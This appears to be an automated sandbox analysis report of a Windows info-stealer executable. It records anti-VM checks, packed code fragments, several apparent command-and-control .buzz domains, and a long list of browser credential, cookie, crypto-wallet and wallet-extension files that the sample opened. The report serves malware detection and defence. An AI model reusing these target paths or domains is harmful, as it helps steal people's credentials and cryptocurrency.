                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Unpacked PE file: 0.2.5Z19n7XRT1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Unpacked PE file: 0.2.5Z19n7XRT1.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043F83E push es; retf 0_2_0043F83F
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_00444520 push ebp; ret 0_2_00444522
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 0_2_0043BF01
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_008BC1CD pushad ; ret 0_2_008BC1D2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_008BC453 push ebp; ret 0_2_008BC458
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CC167 push eax; mov dword ptr [esp], 49484716h 0_2_024CC168
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024CF6A5 push es; retf 0_2_024CF6A6
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_024AAF5D push esp; iretd 0_2_024AAF66
                    Source: 5Z19n7XRT1.exe | Static PE information: section name: .text entropy: 7.373879060362512
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe TID: 6064 | Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
                    Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
                    Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWb
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
                    Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.5.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                    Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.000000000305E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
                    Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
                    Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | API call chain: ExitProcess graph end node graph_0-26318
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0043A9B0 LdrInitializeThunk, 0_2_0043A9B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_008B905B push dword ptr fs:[00000030h] 0_2_008B905B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_0249092B mov eax, dword ptr fs:[00000030h] 0_2_0249092B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Code function: 0_2_02490D90 mov eax, dword ptr fs:[00000030h] 0_2_02490D90

                    HIPS / PFW / Operating System Protection Evasion

                    Source: 5Z19n7XRT1.exe | String found in binary or memory: hummskitnj.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: cashfuzysao.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: appliacnesot.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: screwamusresz.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: inherineau.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: scentniej.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: rebuildeso.buzz
                    Source: 5Z19n7XRT1.exe | String found in binary or memory: prisonyfork.buzz
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0.2.5Z19n7XRT1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.5Z19n7XRT1.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.5Z19n7XRT1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.5Z19n7XRT1.exe.24e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.2160718112.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390575596.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
